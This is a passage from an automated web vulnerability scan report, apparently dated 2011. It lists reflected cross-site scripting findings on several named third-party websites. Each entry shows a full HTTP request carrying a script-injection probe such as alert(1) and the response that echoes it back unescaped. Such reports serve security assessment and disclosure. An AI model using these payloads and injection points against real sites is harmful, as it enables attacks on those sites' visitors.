...[SNIP]...

2.203. http://adomas.org/javascript-mouse-wheel/ [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adomas.org
Path:   /javascript-mouse-wheel/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed24"><script>alert(1)</script>8ed9d5046df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /javascript-mouse-wheelbed24"><script>alert(1)</script>8ed9d5046df/ HTTP/1.1
Host: adomas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: redir-httpd
Date: Sun, 07 Aug 2011 01:21:13 GMT
Location: http://www.adomas.org/javascript-mouse-wheelbed24"><script>alert(1)</script>8ed9d5046df/
Last-Modified: Sat, 06 Aug 2011 22:03:19 GMT
Content-Length: 247
Content-Type: text/html; charset=utf-8

<html><body>You are now redirected to<br><a href="http://www.adomas.org/javascript-mouse-wheelbed24"><script>alert(1)</script>8ed9d5046df/">http://www.adomas.org/javascript-mouse-wheelbed24"><script>a
...[SNIP]...

2.204. http://adomas.org/javascript-mouse-wheel/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adomas.org
Path:   /javascript-mouse-wheel/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00d8"><script>alert(1)</script>f543c4bfe8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /javascript-mouse-wheel/?b00d8"><script>alert(1)</script>f543c4bfe8d=1 HTTP/1.1
Host: adomas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: redir-httpd
Date: Sun, 07 Aug 2011 01:21:05 GMT
Location: http://www.adomas.org/javascript-mouse-wheel/?b00d8"><script>alert(1)</script>f543c4bfe8d=1
Last-Modified: Sat, 06 Aug 2011 22:03:19 GMT
Content-Length: 253
Content-Type: text/html; charset=utf-8

<html><body>You are now redirected to<br><a href="http://www.adomas.org/javascript-mouse-wheel/?b00d8"><script>alert(1)</script>f543c4bfe8d=1">http://www.adomas.org/javascript-mouse-wheel/?b00d8"><scr
...[SNIP]...

2.205. http://adomas.org/javascript-mouse-wheel/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adomas.org
Path:   /javascript-mouse-wheel/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 73ea8<script>alert(1)</script>ba887adcdd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /javascript-mouse-wheel/?73ea8<script>alert(1)</script>ba887adcdd2=1 HTTP/1.1
Host: adomas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: redir-httpd
Date: Sun, 07 Aug 2011 01:21:06 GMT
Location: http://www.adomas.org/javascript-mouse-wheel/?73ea8<script>alert(1)</script>ba887adcdd2=1
Last-Modified: Sat, 06 Aug 2011 22:03:19 GMT
Content-Length: 249
Content-Type: text/html; charset=utf-8

<html><body>You are now redirected to<br><a href="http://www.adomas.org/javascript-mouse-wheel/?73ea8<script>alert(1)</script>ba887adcdd2=1">http://www.adomas.org/javascript-mouse-wheel/?73ea8<script>alert(1)</script>ba887adcdd2=1</a>
...[SNIP]...

2.206. http://go.personalcapital.com/iFrameEmailCapture.html [_mkto_trk cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://go.personalcapital.com
Path:   /iFrameEmailCapture.html

Issue detail

The value of the _mkto_trk cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed3a1"><script>alert(1)</script>ab6675584f4 was submitted in the _mkto_trk cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /iFrameEmailCapture.html HTTP/1.1
Host: go.personalcapital.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.personalcapital.com/
Cookie: ARPT=LKZYVMS172.25.102.96CKMLU; _mkto_trk=id:920-GOG-506&token:_mch-personalcapital.com-1312316983070-34017ed3a1"><script>alert(1)</script>ab6675584f4

Response

HTTP/1.0 200 OK
Date: Tue, 02 Aug 2011 20:32:28 GMT
Server: Apache
Vary: *,Accept-Encoding
Content-Length: 8534
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la
...[SNIP]...
<input type="hidden" name="_mkt_trk" value="id:920-GOG-506&token:_mch-personalcapital.com-1312316983070-34017ed3a1"><script>alert(1)</script>ab6675584f4" />
...[SNIP]...

2.207. http://image.providesupport.com/js/vpntunnelservice/safe-monitor.js [vsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/vpntunnelservice/safe-monitor.js

Issue detail

The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85c36"-alert(1)-"9db60257ee8 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/vpntunnelservice/safe-monitor.js?ps_h=inl0&ps_t=1312283803461 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.vpnfortress.com/set-up-vpn.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=Y5ZHpNxBXE7G85c36"-alert(1)-"9db60257ee8

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 2906
Date: Tue, 02 Aug 2011 11:16:53 GMT
Connection: close

var psinl0sid = "Y5ZHpNxBXE7G85c36"-alert(1)-"9db60257ee8";
// safe-monitor@gecko.js

var psinl0iso;
try {
   psinl0iso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psinl0wid != null);
} catch(e) {
   psinl0iso = false;
}
if (psinl0iso) {
...[SNIP]...

2.208. http://msn.bolsademulher.com/mundomelhor/ecologia-para-vestir-107388.html [bdm_unique cookie]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://msn.bolsademulher.com
Path:   /mundomelhor/ecologia-para-vestir-107388.html

Issue detail

The value of the bdm_unique cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb328'%3b0599b256b6d was submitted in the bdm_unique cookie. This input was echoed as bb328';0599b256b6d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mundomelhor/ecologia-para-vestir-107388.html HTTP/1.1
Host: msn.bolsademulher.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msn.bolsademulher.com/mundomelhor/ecologia-para-vestir-107388.html
Cookie: Sample=59; SID=qqvipoi2pmmm1uncngsj2nc193; bdm_unique=3232235620131237150859bb328'%3b0599b256b6d; __utma=172628671.1120725202.1312371525.1312371525.1312371525.1; __utmb=172628671.1.10.1312371525; __utmc=172628671; __utmz=172628671.1312371525.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=172628671.1120725202.1312371525.1312371525.1312371525.1; __utmb=172628671.2.10.1312371525; __utmc=172628671; __utmz=172628671.1312371525.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; Sample=59

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 11:46:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
X-Server: webhead-01
Content-Length: 68336
Via: nginx

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="pt-br">
<head>
       <title>Ecologia para vestir - Mundo Melhor no Bolsa de Mulher | MSN Mulher</titl
...[SNIP]...
<script type="text/javascript">

var _gaq = _gaq || [];
                               _gaq.push(['_setAccount', 'UA-717773-15']);

                               _gaq.push(['_setCustomVar',3, 'bdm_unique', '3232235620131237150859bb328';0599b256b6d', 3]);
                   _gaq.push(['_setCustomVar',5, 'bdm_unique_pagename', '3232235620131237150859bb328';0599b256b6d:mundomelhor', 3]);
               
               _gaq.push(['_setCustomVar',2, 'bdm_pagename', 'mundomelhor', 3]);
...[SNIP]...

2.209. http://msn.estatico2.bolsademulher.com/img/generic/hover-menu.png [bdm_unique cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.estatico2.bolsademulher.com
Path:   /img/generic/hover-menu.png

Issue detail

The value of the bdm_unique cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adf46'%3balert(1)//bedb0aaa228 was submitted in the bdm_unique cookie. This input was echoed as adf46';alert(1)//bedb0aaa228 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/generic/hover-menu.png HTTP/1.1
Host: msn.estatico2.bolsademulher.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msn.estatico2.bolsademulher.com/css/mn/css/pt-br/menu,css/generic/layout,css/generic/msn,css/generic/component/seuestilo,css/generic/component/makeup,static/msn/css/generic/materia,static/msn/css/generic/box_resposta,,/BDM_minify.css?v49568245
Cookie: SID=qqvipoi2pmmm1uncngsj2nc193; bdm_unique=3232235620131237150859adf46'%3balert(1)//bedb0aaa228; Sample=59

Response

HTTP/1.1 404 Not Found
Date: Wed, 03 Aug 2011 12:00:29 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Server: webhead-01
Content-Length: 26567

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="pt-br">
<head>
       <title>Bolsa de Mulher. O melhor conte..do com a maior rede de amigas da interne
...[SNIP]...
<script type="text/javascript">

var _gaq = _gaq || [];
                               _gaq.push(['_setAccount', 'UA-717773-15']);

                               _gaq.push(['_setCustomVar',3, 'bdm_unique', '3232235620131237150859adf46';alert(1)//bedb0aaa228', 3]);
                   _gaq.push(['_setCustomVar',5, 'bdm_unique_pagename', '3232235620131237150859adf46';alert(1)//bedb0aaa228:GERAL', 3]);
               
               _gaq.push(['_setCustomVar',2, 'bdm_pagename', 'GERAL', 3]);

...[SNIP]...

2.210. http://o.lomadee.com/loc/locWrite.html [lmdinfo cookie]  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://o.lomadee.com
Path:   /loc/locWrite.html

Issue detail

The value of the lmdinfo cookie is copied into the HTML document as plain text between tags. The payload fa779<a>1b2bafb06a9 was submitted in the lmdinfo cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /loc/locWrite.html?callback=json1&cx=2792&ul=http%3A%2F%2Fmsn.buscape.com.br%2Finstrumentos-musicais.html&tt=MSN%20Shopping&h1=Instrumentos%20Musicais&re=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&us=502312310620110803131826&pa=3627&pd=BP&tm=1920x1200&cr=16-bit HTTP/1.1
Host: o.lomadee.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msn.buscape.com.br/instrumentos-musicais.html
Cookie: lmdinfo=id_user=502312310620110803131833178fa779<a>1b2bafb06a9; loc=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://docs.lomadee.com/w3c/p3p.xml", CP="PSA CONo OUR ONL BUS NOI"
Connection: close
Set-Cookie: lmdinfo=id_user=502312310620110803131833178fa779<a>1b2bafb06a9; Domain=.lomadee.com; Expires=Thu, 07-Jul-2016 16:21:37 GMT; Path=/
Set-Cookie: loc=cx=2792; Domain=.lomadee.com; Expires=Thu, 07-Jul-2016 16:21:37 GMT; Path=/
Set-Cookie: loc=cx=2792|2792; Domain=.lomadee.com; Expires=Thu, 07-Jul-2016 16:21:37 GMT; Path=/
Content-Type: text/html
Content-Length: 97
Date: Wed, 03 Aug 2011 16:21:37 GMT

json1({"idloc":"502312310620110803131833178fa779<a>1b2bafb06a9","idloc_expires_sec":"155520000"})

Report generated by XSS.CX at Mon Aug 08 06:40:48 GMT-06:00 2011.